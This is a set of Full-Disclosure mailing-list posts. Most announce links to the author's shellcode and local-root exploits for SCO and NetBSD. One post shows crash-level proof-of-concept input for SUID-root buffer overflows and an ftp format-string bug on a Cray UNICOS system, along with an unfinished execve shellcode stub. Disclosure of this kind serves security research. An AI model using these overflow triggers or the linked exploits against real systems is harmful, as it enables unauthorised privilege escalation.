http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia -
> http://secunia.com/
> 




___ 
Yahoo! Photos – NEW, now offering a quality print service from just 8p a photo 
http://uk.photos.yahoo.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Linux shellcodes

[Micheal Turner]

http://prdelka.blackart.org.uk/sh3lLc0de/prdelka-vs-LINUX-shellcode.tgz





___ 
Yahoo! Messenger - NEW crystal clear PC to PC calling worldwide with voicemail 
http://uk.messenger.yahoo.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] SUID root overflows in UNICOS and partial shellcode

[Micheal Turner]

Cray PVP Exploitation (Historical Hacking)
=
--[ Misc CPU information
This Cray Y-MP EL with 4 CPUs and 1 GB of RAM is
running UNICOS Release 9.0
[EMAIL PROTECTED] guest]$ uname -a
sn5176 sn5176 9.0.2.2 sin.0 CRAY Y-MP
[EMAIL PROTECTED] guest]$ df
/(/dev/dsk/root):129232 .5K blocks
( 14.7%)25880 I-nodes
/tmp (/dev/dsk/tmp ):   1966952 .5K blocks
( 98.3%)62402 I-nodes
/usr (/dev/dsk/usr ):  7016 .5K blocks
(  0.5%)22571 I-nodes
/usr/src (/dev/dsk/src ):429312 .5K blocks
( 44.7%)25958 I-nodes
/adddisk1(/dev/dsk/opt ):704760 .5K blocks
( 58.7%)31671 I-nodes
/proc(/proc):   2007520 .5K blocks
( 97.6%)  629 procs
/onserver(server:/disk1/exports/yel):
   54180728 .5K blocks
( 70.4%)
/home(server:/disk1/home):
   54180728 .5K blocks
( 70.4%)
/var/sysinfo (server:/var/sysinfo):
7389440 .5K blocks
( 61.7%)
/secure  (server:/secure   ):   7389440 .5K blocks
( 61.7%)


==[ Vulnerabilities
--[ /usr/bin/script suid root command
line args buffer overflow
-rwsr-xr-x   1 root bin   73 Sep  5  1996
/usr/bin/script
[EMAIL PROTECTED] guest]$ script `perl -e 'print "A"x1000'`
Operand range error (core dumped)

--[ /etc/nu suid root file parsing
buffer overflow
-rwsr-xr-x   1 root bin  1045400 Sep  4  1996
/etc/nu

[EMAIL PROTECTED] guest]$ echo "" >> /tmp/acid
[EMAIL PROTECTED] guest]$ udbgen -p /tmp
udbgen: An acid file with at least one line is
required
Acid format: 'account_name:account_id'
udbgen: /tmp/group: No such file or directory
udbgen: A group file with at least one line is
required
Group format: 'group_name:*:group_id:'
[EMAIL PROTECTED] guest]$ echo `perl -e 'print "A"x1'` >>
/tmp/script
[EMAIL PROTECTED] guest]$ /etc/nu -p /tmp -c /tmp/script -a
admin/udb/nu/nu.c   90.709/03/96 10:43:53
(sn5176:/tmp/script)
nu: no GroupHome information in /tmp/script
Operand range error (core dumped)

-[ /bin/ftp QUOTE format string vuln
(BSD ftp client bug) [non suid]
ftp> quote %08x.%08x.%08x.%08x.
500
'C001D496.253038782E253038.782E253038782E25.3038782E001B.':
command not understood.
ftp> quote %n%n%n%n%n
Operand range error (core dumped)

-[ UNICOS Shellcoding CRAY PVP
The CRAY PVP does not natively support a 'syscall'
instruction(unlike the new Cray X1, where
the OS node provides a system call interface to the
other nodes.) instead, we will use the
systems standard libaries (which are linked in to
most, if not all applications). Particularly
we will focus on 'libu.a', which provides the UNICOS
Standard Library. 

** INCOMPLETE **
[EMAIL PROTECTED] guest]$ as -f myfile.s
[EMAIL PROTECTED] guest]$ segldr -e MAIN myfile.o -lu
 ldr-240 segldr: CAUTION
 Entry point 'MAIN' in module 'PROG1' from file
'myfile.o' was specified on
 an XFER directive but is not a primary entry.
[EMAIL PROTECTED] guest]$ ./a.out
[EMAIL PROTECTED] guest]$ cat myfile.s
IDENT   PROG1
MAINENTER
CALLexecve  ;; arguements required.
EXIT
END

[EMAIL PROTECTED] guest]$


--[ Documentation sites
http://oscinfo.osc.edu:8080/dynaweb/@CategoryView 
http://dynaweb.tacc.utexas.edu:8080/dynaweb/@DisplayHomepage
http://www.cray.com/



___ 
NEW Yahoo! Cars - sell your car and browse thousands of new and used cars 
online! http://uk.cars.yahoo.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Blind port scanning with sequential TCP numbers

[Micheal Turner]

http://prdelka.blackart.org.uk/toOlz/mIRCDCCx

IPID inspired take on sequential TCP source port
scanning, another vector could be the use of HTML
embedded frames and telnet://.




___ 
To help you stay safe and secure online, we've developed the all new Yahoo! 
Security Centre. http://uk.security.yahoo.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: SCO Openserver 5.0.x exploit

[Micheal Turner]

http://seclists.org/lists/bugtraq/2006/Jan/0018.html
..
http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SCO-termshx.c

Wow im so popular, RoD hEDoR is the second person who
wants to be ME, including RST member copy + pasting my
sudo exploit! RoD hEDoR, you forgot to mention (like
in my header) that the return address in the exploit
is for SCO Openserver 5.0.7. 

*
  S U P P O R T   N O N E   D I S C L O S U R
E   
*
  DONT GIVE FIREARMS TO KIDZ.




___ 
To help you stay safe and secure online, we've developed the all new Yahoo! 
Security Centre. http://uk.security.yahoo.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] http://prdelka.blackart.org.uk/exploitz/prdelka-vs-BSD-ptrace.tar.gz

[Micheal Turner]

NetBSD 2.1 & below ptrace() local root exploit.



___ 
To help you stay safe and secure online, we've developed the all new Yahoo! 
Security Centre. http://uk.security.yahoo.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] http://prdelka.blackart.org.uk/paperz/VAstacksmash.txt

[Micheal Turner]

Linux kernel recently incorporated a protection which
randomizes the stack making exploitation of
stack based overflows more difficult. I present here
an attack which works on exploiting static
addresses in Linux. You should be familiar with
standard stack smashing before attempting this 
paper.

Thank you.



___ 
To help you stay safe and secure online, we've developed the all new Yahoo! 
Security Centre. http://uk.security.yahoo.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] prdelka.blackart.org.uk

[Micheal Turner]

see site.





___

Yahoo! Messenger - NEW crystal clear PC to PC calling
worldwide with voicemail http://uk.messenger.yahoo.com



___ 
How much free photo storage do you get? Store your holiday 
snaps for FREE with Yahoo! Photos http://uk.photos.yahoo.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/